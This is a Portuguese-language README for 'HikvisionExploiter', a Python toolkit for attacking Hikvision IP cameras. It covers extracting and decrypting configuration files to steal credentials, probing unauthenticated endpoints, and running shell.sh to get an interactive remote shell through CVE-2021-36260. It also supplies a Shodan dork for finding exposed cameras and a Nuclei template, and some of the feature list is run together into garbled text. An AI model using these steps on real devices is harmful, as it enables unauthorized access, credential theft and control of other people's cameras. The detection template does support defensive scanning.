
HikvisionExploiter é um utilitário baseado em Python projetado para automatizar a exploração e verificações de acessibilidade de diretórios em câmeras de rede Hikvision, explorando a interface web Versão 3.1.3.150324 + Detecção de CVE-2021-36260
HikvisionExploiter é um kit de ferramentas de exploração automatizado e poderoso, direcionado a endpoints não autenticados em câmeras IP Hikvision, particularmente aquelas que executam a versão de firmware 3.1.3.150324.
Ele realiza:
Construído para pesquisadores, equipes de red team e entusiastas de segurança IoT.
/onvif-http/snapshot para exposição de snapshots/System/configurationFile, descriptografa usando AES + XOR e extrai credenciais/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (opcional, para futura capacidade de snapshot para vídeo)pycrypto (para descriptografia de configuração):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Crie um arquivo targets.txt com o seguinte formato:
IP:PORT
Exemplo:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Isso irá:
logs/IP_PORT_TIMESTAMP/Para executar comandos interativamente em um dispositivo vulnerável:
chmod +x shell.sh
./shell.sh <ip:port>
Exemplo:
./shell.sh 192.168.1.10:80
Se vulnerável, você entrará em um shell interativo:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Use o seguinte dork do Shodan para localizar câmeras Hikvision expostas:
3.1.3.150324
Um template compatível com Nuclei está incluído: nuclei-template.yaml
Uso:
nuclei -t nuclei-template.yaml -list targets.txt
Detecta:
Licença MIT ©
Veja LICENSE para mais detalhes.
Telegram: @HexBuddy127001
Construído com ❤️ apenas para pesquisa educacional e ética.